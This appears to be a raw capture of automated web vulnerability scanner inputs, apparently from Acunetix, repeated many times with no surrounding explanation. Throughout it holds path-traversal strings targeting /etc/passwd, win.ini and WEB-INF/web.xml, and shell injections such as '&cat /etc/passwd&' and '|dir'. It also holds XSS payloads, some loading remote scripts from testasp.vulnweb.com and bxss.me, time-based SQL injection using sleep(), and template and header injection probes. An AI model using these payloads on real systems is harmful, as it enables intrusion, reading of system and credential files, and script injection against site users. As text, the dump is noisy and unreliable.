fbRtLoVJ')

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

ePn871lr'))

1<input autofocus onfocus=prompt(940793)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1

................windowswin.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1_FmJxi <ScRiPt >prompt(910914)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

|cat /etc/passwd#

1

1

../../../../../../../../../../etc/passwd.jpg

${99513+100220}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"|"ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

testasp.vulnweb.com

1&n941411=v998970

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

WEB-INF/web.xml

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF\web.xml

1

'

1

)

1

/etc/passwd

"

!(()&&!|*|*|

1

1

^(#$!@#$)(()))******

1

acu2552\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2552

1

1

||cat /etc/passwd

1

1

'"()

1

1

1

&dir

acux5076\xc0\xbez1\xc0\xbcz2a\x90bcxuca5076

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<ScRiPt >prompt(967104)</ScRiPt>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<script>prompt(927721)</script>

1

1

1

'

1<ScRiPt >prompt(954498)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1

"&dir&"

1

1

"

http://hitpaRByt46V6.bxss.me/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946722></ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

comments

-1)

1

|dir

1

1

1<ScRiPt >prompt(903460)</ScRiPt>

comments/.

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1<video><source onerror="javascript:prompt(966105)">

1

'|dir

1

1

file:///etc/passwd

1

EZomTUWn'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990400)"></g></svg>

1

1

1

1

Mm5hPFFs')

"|dir

1

1<div style=width:expression(prompt(939707))>

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

QBe0Nsop'))

1

1

1<iframe src='data:text/html

'"

WEB-INF/web.xml

1

1

-1

1

<!--

1<body onload=prompt(998433)>

1

1

WEB-INF\web.xml

1

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949866)>

1

../../../../../../../../../../windows/win.ini

1

-1))

1'"()&%<ScRiPt >prompt(979276)</ScRiPt>

1

1

1

1

1<img src=xyz OnErRor=prompt(908991)>

1

oA4RFucp'

response.write(9839778*9888339)

1

'"()&%<ScRiPt >prompt(900365)</ScRiPt>

../../../../../../../../../../boot.ini

1<img/src=">" onerror=alert(937775)>

1

4ynVihov')

&cat /etc/passwd&

1<ScRiPt%20>prompt(958753)</sCripT>

1_948422

1

'+response.write(9839778*9888339)+'

1

CCHSuooz'))

../../../../../../../../../../windows/win.ini.jpg

'&cat /etc/passwd&'

1&lt

"+response.write(9839778*9888339)+"

1

1

1

"&cat /etc/passwd&"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

\xf6<img acu onmouseover=prompt(951856) //\xf6>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

1<input autofocus onfocus=prompt(969692)>

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

|cat /etc/passwd#

1

1

1

1_8cutG <ScRiPt >prompt(988404)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'|'ld

1

1

../../../../../../../../../../etc/passwd.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

${100379+100019}

1

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

testasp.vulnweb.com

'

WEB-INF/web.xml

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&n997664=v975648

1

1

"

1

1

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1

1

1

1

/etc/passwd

&dir

)

1

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

'"()

1

'&dir&'

1

1

1

acu4714\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4714

1

1

acux3267\xc0\xbez1\xc0\xbcz2a\x90bcxuca3267

"&dir&"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

'

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(994204)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

1

|dir

-1

1

1<script>prompt(973269)</script>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitJLGcHM7Cjr.bxss.me/

-1)

1<ScRiPt >prompt(909848)</ScRiPt>

1

comments

'|dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

comments/.

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942850></ScRiPt>

1

"|dir

1

jvYSwhxa'

1<ScRiPt >prompt(934644)</ScRiPt>

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1<video><source onerror="javascript:prompt(961471)">

b0eBEiSh')

file:///etc/passwd

1

1

1

1

1

jnGdgMLg'))

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974530)"></g></svg>

http://www.acunetix.tst

1

'"

-1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1<div style=width:expression(prompt(912750))>

1

1

-1)

1

1'"()&%<ScRiPt >prompt(946893)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1<iframe src='data:text/html

-1))

1

1

'"()&%<ScRiPt >prompt(944057)</ScRiPt>

1

response.write(9891224*9224061)

1

1

6pExsX2C'

WEB-INF\web.xml

1<body onload=prompt(934978)>

1

1_976869

'+response.write(9891224*9224061)+'

&cat /etc/passwd&

HAoB7TuL')

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971581)>

1

9oy9LGoC'))

"+response.write(9891224*9224061)+"

../../../../../../../../../../windows/win.ini

1<img src=xyz OnErRor=prompt(939826)>

1

'&cat /etc/passwd&'

1

1

1

1<img/src=">" onerror=alert(974270)>

../../../../../../../../../../boot.ini

1

1<ScRiPt%20>prompt(976407)</sCripT>

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd

1&lt

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(937738) //\xf6>

1

1

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

................windowswin.ini

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<input autofocus onfocus=prompt(993784)>

'|'ld

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

1

${100300+99614}

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1_oVTvT <ScRiPt >prompt(951740)</ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1some_inexistent_file_with_long_name%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

testasp.vulnweb.com

1

'

/etc/passwd

1

1

1

1

"

1

1

1

||cat /etc/passwd

1&n907054=v927550

WEB-INF/web.xml

1

1

)

&dir

WEB-INF\web.xml

!(()&&!|*|*|

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

^(#$!@#$)(()))******

1

1

'&dir&'

1

acu4064\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4064

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acux4250\xc0\xbez1\xc0\xbcz2a\x90bcxuca4250

'

|dir

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"

1

1<ScRiPt >prompt(930432)</ScRiPt>

1

'|dir

acunetix_wvs_invalid_filename

http://hituXpzmwrhKM.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1<script>prompt(985153)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

"|dir

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1<ScRiPt >prompt(969077)</ScRiPt>

file:///etc/passwd

-1

1

1

1

1

1

comments

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900804></ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

1

-1))

1

1

1

1<ScRiPt >prompt(971466)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1<video><source onerror="javascript:prompt(929679)">

1

1

BQLMeaJM'

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994013)"></g></svg>

1

1

Kjsk5jmB')

1

http://www.acunetix.tst

1<div style=width:expression(prompt(985149))>

'"

1

1

../../../../../../../../../../windows/win.ini

1<iframe src='data:text/html

1

1

dyyYhFHg'))

<!--

1

1'"()&%<ScRiPt >prompt(976612)</ScRiPt>

1<body onload=prompt(992385)>

1

../../../../../../../../../../boot.ini

response.write(9442500*9886255)

1

-1

1

1

'"()&%<ScRiPt >prompt(964007)</ScRiPt>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978097)>

1

'+response.write(9442500*9886255)+'

../../../../../../../../../../windows/win.ini.jpg

1

1

-1)

1

1_976770

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(912461)>

"+response.write(9442500*9886255)+"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

-1))

1

1<img/src=">" onerror=alert(972613)>

1

TFHfIh11'

1

'&cat /etc/passwd&'

................windowswin.ini

32h1xfZx')

1

1

1

1<ScRiPt%20>prompt(939826)</sCripT>

Fd4v346Y'))

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1&lt

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

\xf6<img acu onmouseover=prompt(911276) //\xf6>

`cat /etc/passwd`

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<input autofocus onfocus=prompt(918045)>

1

../../../../../../../../../../etc/passwd

|cat /etc/passwd#

<a href='http://www.acunetix.com'>website security</a>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

${100147+100462}

1

1_Pjvyn <ScRiPt >prompt(938498)</ScRiPt>

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

"|"ld

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

1

1

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"

1&n922560=v992779

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

||cat /etc/passwd

1

1

1

1

1

1

/etc/passwd

1

&dir

1

acu5386\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5386

)

1

acux9951\xc0\xbez1\xc0\xbcz2a\x90bcxuca9951

'&dir&'

'"()

!(()&&!|*|*|

1

1<ScRiPt >prompt(947797)</ScRiPt>

1

'

1

^(#$!@#$)(()))******

"&dir&"

"

1<script>prompt(989413)</script>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<ScRiPt >prompt(982457)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

|dir

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?980783></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

http://hitLvqwDmvjEH.bxss.me/

1

'|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

1<ScRiPt >prompt(966061)</ScRiPt>

1

1

1

acunetix_wvs_invalid_filename

-1)

1<video><source onerror="javascript:prompt(974374)">

"|dir

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926590)"></g></svg>

-1))

comments

1

1

1

1

1

comments

bDG9fO1x'

1<div style=width:expression(prompt(914146))>

1

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1<iframe src='data:text/html

fmT7smKj')

1

comments/.

http://www.acunetix.tst

1

1

1<body onload=prompt(972404)>

1

/\../\../\../\../\../\../\../etc/passwd

H2WyQOnk'))

1

'"

1'"()&%<ScRiPt >prompt(928819)</ScRiPt>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971033)>

1

-1

1

<!--

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(992885)</ScRiPt>

-1)

1

1<img src=xyz OnErRor=prompt(976713)>

1

1

1

1

1

1_975443

-1))

1

1<img/src=">" onerror=alert(979520)>

WEB-INF\web.xml

response.write(9896298*9127222)

1

HLYppx0b'

1

1

'+response.write(9896298*9127222)+'

1<ScRiPt%20>prompt(905623)</sCripT>

1

"+response.write(9896298*9127222)+"

1

kVdBgMGL')

1

../../../../../../../../../../windows/win.ini

1

1

cvQj3zQ1'))

1&lt

&cat /etc/passwd&

1

1

../../../../../../../../../../boot.ini

1

1

\xf6<img acu onmouseover=prompt(976794) //\xf6>

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<input autofocus onfocus=prompt(998072)>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

`cat /etc/passwd`

1_6kN7d <ScRiPt >prompt(985991)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

${99548+99177}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n940644=v988044

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

'

WEB-INF/web.xml

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"

1

1

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1

!(()&&!|*|*|

acu8033\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8033

WEB-INF\web.xml

'"()

/etc/passwd

1

^(#$!@#$)(()))******

acux3895\xc0\xbez1\xc0\xbcz2a\x90bcxuca3895

1

&dir

1

1<ScRiPt >prompt(983537)</ScRiPt>

1

1

1

1

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<script>prompt(915499)</script>

'

1

1

"&dir&"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<ScRiPt >prompt(993531)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976050></ScRiPt>

acunetix_wvs_invalid_filename

|dir

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hit1UBDeqDWzw.bxss.me/

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

comments

1<ScRiPt >prompt(980006)</ScRiPt>

1

'|dir

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<video><source onerror="javascript:prompt(985075)">

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1

1

"|dir

file:///etc/passwd

1

1

comments/.

-1)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967833)"></g></svg>

1

1

1

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

-1))

'"

1<div style=width:expression(prompt(969423))>

1

1

WEB-INF/web.xml

<!--

1

RgPjQIrv'

1

1

1

Iv3J2vDZ')

1

1<iframe src='data:text/html

1

7S55Snvh'))

1

1

WEB-INF\web.xml

1

1

1

1<body onload=prompt(988215)>

1

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999828)>

1

../../../../../../../../../../windows/win.ini

1

1'"()&%<ScRiPt >prompt(991285)</ScRiPt>

1

-1)

response.write(9891184*9853551)

1<img src=xyz OnErRor=prompt(985772)>

1

-1))

1

'"()&%<ScRiPt >prompt(937669)</ScRiPt>

../../../../../../../../../../boot.ini

1<img/src=">" onerror=alert(976964)>

'+response.write(9891184*9853551)+'

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

8moHoqpJ'

1

1<ScRiPt%20>prompt(936707)</sCripT>

1_995952

"+response.write(9891184*9853551)+"

SomeCustomInjectedHeader:injected_by_wvs

XBtgKUOE')

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

vFArdYlg'))

1

'&cat /etc/passwd&'

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(967302) //\xf6>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

"&cat /etc/passwd&"

1

1

1

1<input autofocus onfocus=prompt(954226)>

1

1

................windowswin.ini

../../../../../../../../../../etc/passwd

<a href='http://www.acunetix.com'>website security</a>

cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

..\..\..\..\..\..\..\..\windows\win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

`cat /etc/passwd`

1_Qs6BW <ScRiPt >prompt(958095)</ScRiPt>

${99615+99336}

1

../../../../../../../../../../etc/passwd.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

1

"|"ld

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n937543=v904589

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF/web.xml

1

'

1

1

1

)

1

WEB-INF\web.xml

/etc/passwd

!(()&&!|*|*|

"

1

^(#$!@#$)(()))******

1

1

1

||cat /etc/passwd

1

1

1

'"()

1

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

'

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acu1880\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1880

"&dir&"

1

1

1

"

-1)

1

|dir

-1))

1

1

acunetix_wvs_invalid_filename

acux3595\xc0\xbez1\xc0\xbcz2a\x90bcxuca3595

${@print(md5(acunetix_wvs_security_test))}

1

URdZanwC'

file:///etc/passwd

'|dir

http://hitBIeBM5TFYd.bxss.me/

1

1

uWBaDZMI')

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1

1

1<ScRiPt >prompt(908937)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

vXeyo4ww'))

1

"|dir

comments

1

1

WEB-INF/web.xml

1

1

-1

1<script>prompt(987603)</script>

1

1

comments/.

1

1

1<ScRiPt >prompt(999319)</ScRiPt>

WEB-INF\web.xml

1

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

http://www.acunetix.tst

../../../../../../../../../../windows/win.ini

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927010></ScRiPt>

1

1

1

1

1

1

1

IViEAypB'

1<ScRiPt >prompt(967017)</ScRiPt>

../../../../../../../../../../boot.ini

response.write(9685337*9052205)

1

1'"()&%<ScRiPt >prompt(950543)</ScRiPt>

'"

'+response.write(9685337*9052205)+'

l0u6nTRF')

1

'"()&%<ScRiPt >prompt(939967)</ScRiPt>

<!--

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(927792)">

"+response.write(9685337*9052205)+"

1

TKiiPhRR'))

1

1

1_904115

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908502)"></g></svg>

1

